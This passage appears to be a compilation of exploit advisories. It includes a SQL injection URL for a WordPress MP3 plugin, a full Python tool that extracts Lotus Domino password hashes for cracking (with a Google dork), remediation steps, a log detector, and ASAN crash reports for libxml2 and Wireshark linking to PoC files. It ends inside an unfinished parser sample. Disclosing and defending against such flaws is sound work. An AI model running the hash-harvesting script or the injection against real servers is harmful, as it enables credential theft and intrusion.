: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is a plugin for building an MP3 grabber site on WordPress.
Proof of Concept
========
Vulnerable URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!
# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit
# Google Dork: inurl:names.nsf?opendatabase
# Date: 02-24-2016
# Exploit Author: Jonathan Broche
# Contact: https://twitter.com/g0jhonny
# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/
# Tested on: Lotus Domino 8.5
# CVE : CVE-2005-2428
1. Description
IBM Domino databases contain a configuration issue allowing users to obtain password hashes, configuration information and more from the Public Address Book (i.e., the names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields of each user document in the database.
2. Proof of Concept
#!/usr/bin/env python2
import requests, re, BeautifulSoup, sys, argparse, os

requests.packages.urllib3.disable_warnings()

parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")

if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

print "\nDomino Effect {}\n".format(parser.version)

headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}

# fetch the People view, which links to every Person document
try:
    response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
except requests.exceptions.Timeout as e:
    print "[!] Timed out, try again."
    sys.exit(1)
except Exception as e:
    print e
    sys.exit(1)   # response would be undefined below

soup = BeautifulSoup.BeautifulSoup(response.text)
links = []

#grab all user profile links
for link in soup.findAll('a'):
    if "OpenDocument" in link['href']:
        if link['href'] not in links:
            links.append(link['href'])

hashes = {}
for link in links: #get user profile
    try:
        response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
    except requests.exceptions.Timeout as e:
        continue      # skip this document rather than re-parsing the previous response
    except Exception as e:
        print e
        continue
    if response.text:
        soup = BeautifulSoup.BeautifulSoup(response.text)
        name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
        httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
        dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
        if httppassword and httppassword not in hashes.keys():
            hashes[httppassword] = name
        elif dsphttppassword and dsphttppassword not in hashes.keys():
            hashes[dsphttppassword] = name

if hashes: #output
    if args.hashcat or args.john:
        if args.hashcat:
            for h in hashes.keys():
                print h
        if args.john:
            for h, n in hashes.items():
                print "{}:{}".format(n,h)
    else:
        for h, n in hashes.items():
            print "[*] User: {} Hash: {}".format(n, h)
    print "\n{} hashes obtained\n".format(len(hashes))
3. Solution
To hide the HTTP password from the HTML source:
1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2) Find the fields: $dspHTTPPassword and HTTPPassword.
3) In the field properties for both fields, on the hide tab under "Hide paragraph from" check "Web browsers".
4) Open the Person form (Under Forms).
5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
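The harvesting pattern the tool above relies on (one request for the People view, then one OpenDocument request per user) is easy to spot in a web server access log. The detector below is an added example and is not part of this advisory; it assumes the Domino HTTP server writes Common Log Format lines (the sample lines are constructed) and flags any client that lists People?OpenView and then opens several Person documents within a short window.

```python
"""Spot names.nsf enumeration in a Domino HTTP access log.

Added example, not part of the advisory. Common Log Format is assumed for
the access log, and every line in SAMPLE_LOG is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2016:10:15:01 +0000] "GET /names.nsf/People?OpenView HTTP/1.1" 200 18342
203.0.113.7 - - [24/Feb/2016:10:15:02 +0000] "GET /names.nsf/People/0001?OpenDocument HTTP/1.1" 200 4120
203.0.113.7 - - [24/Feb/2016:10:15:03 +0000] "GET /names.nsf/People/0002?OpenDocument HTTP/1.1" 200 4098
203.0.113.7 - - [24/Feb/2016:10:15:04 +0000] "GET /names.nsf/People/0003?OpenDocument HTTP/1.1" 200 4133
203.0.113.7 - - [24/Feb/2016:10:15:05 +0000] "GET /names.nsf/People/0004?OpenDocument HTTP/1.1" 200 4101
198.51.100.3 - - [24/Feb/2016:10:20:00 +0000] "GET /names.nsf/People?OpenView HTTP/1.1" 200 18342
198.51.100.3 - - [24/Feb/2016:10:20:05 +0000] "GET /names.nsf/People/0007?OpenDocument HTTP/1.1" 200 4120
192.0.2.9 - - [24/Feb/2016:10:21:00 +0000] "GET /homepage.nsf?Open HTTP/1.1" 200 2210
"""


def parse_log(text):
    """Parse CLF lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        # the timezone offset is dropped; all lines of one log share it
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        entries.append({"ip": m["ip"], "ts": ts, "path": m["path"],
                        "status": int(m["status"])})
    return entries


def find_harvesters(entries, min_docs=3, window=timedelta(minutes=5)):
    """Return {ip: documents_opened} for clients that request People?OpenView
    and then open at least min_docs Person documents within `window`.
    Only 2xx responses count: a 401/403 means no document was served."""
    last_view = {}
    docs = defaultdict(int)
    for e in entries:
        if not 200 <= e["status"] < 300:
            continue
        path = e["path"].lower()
        if "names.nsf" not in path:
            continue
        if "people?openview" in path:
            last_view[e["ip"]] = e["ts"]
            docs[e["ip"]] = 0            # a new listing starts a new count
        elif "?opendocument" in path and e["ip"] in last_view:
            if e["ts"] - last_view[e["ip"]] <= window:
                docs[e["ip"]] += 1
    return {ip: n for ip, n in docs.items() if n >= min_docs}


if __name__ == "__main__":
    for ip, n in find_harvesters(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: listed the People view, then opened {n} Person documents")
```

The threshold and window are deliberately parameters: a directory browser opening two or three records by hand looks the same as the first seconds of a harvest, so the rule should be tuned on the server's normal traffic before it pages anyone.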
Source: https://code.google.com/p/google-security-research/issues/detail?id=636
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
READ of size 1 at 0x62100001c900 thread T0
#0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
#1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
#2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
#3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
#4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
#2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
#3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
#4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
#5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
#6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
#7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
#9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
Shadow bytes around the buggy address:
0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26202==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39494.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=639
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828
READ of size 1 at 0x6290000051ff thread T0
#0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6
#1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9
#2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2
#3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5
#4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9
#5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5
#6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f4df5219729 (/lib/x86_64-linux-gnu/libz.so.1+0xf729)
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal
Shadow bytes around the buggy address:
0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4210==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39493.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=638
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
READ of size 1 at 0x6290000049e6 thread T0
#0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
#1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
#6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
#7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
#8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
#9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
#10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
#11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
Shadow bytes around the buggy address:
0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4588==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39492.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=637
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
READ of size 73661 at 0x631000010810 thread T0
#0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
#2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
#3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
#4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
#6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25920==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39491.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
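The five sanitizer reports above (four libxml2, one Wireshark) all carry the same few fields an analyst sorts by: whether the access is a read or a write, how large it is, the first frame outside the sanitizer runtime, and how far outside the allocation the access lands. The parser below is an added example and is not part of these Google Security Research reports; its two sample inputs are trimmed excerpts of the first libxml2 report and the Wireshark report on this page.

```python
"""Extract triage fields from AddressSanitizer heap-buffer-overflow reports.

Added example, not part of the bug reports above. The samples are trimmed
excerpts of two reports on this page.
"""
import re

HEADER = re.compile(r"ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)", re.M)
FRAME = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (?P<func>\S+) (?P<loc>\S+)", re.M)
REGION = re.compile(r"is located (?P<dist>\d+) bytes to the (?P<side>left|right) of "
                    r"(?P<rsize>\d+)-byte region \[(?P<lo>0x[0-9a-f]+),(?P<hi>0x[0-9a-f]+)\)")
RUNTIME_PREFIXES = ("__asan", "__interceptor", "__sanitizer")

LIBXML_REPORT = """\
==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
READ of size 1 at 0x62100001c900 thread T0
    #0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
    #1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
allocated by thread T0 here:
    #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
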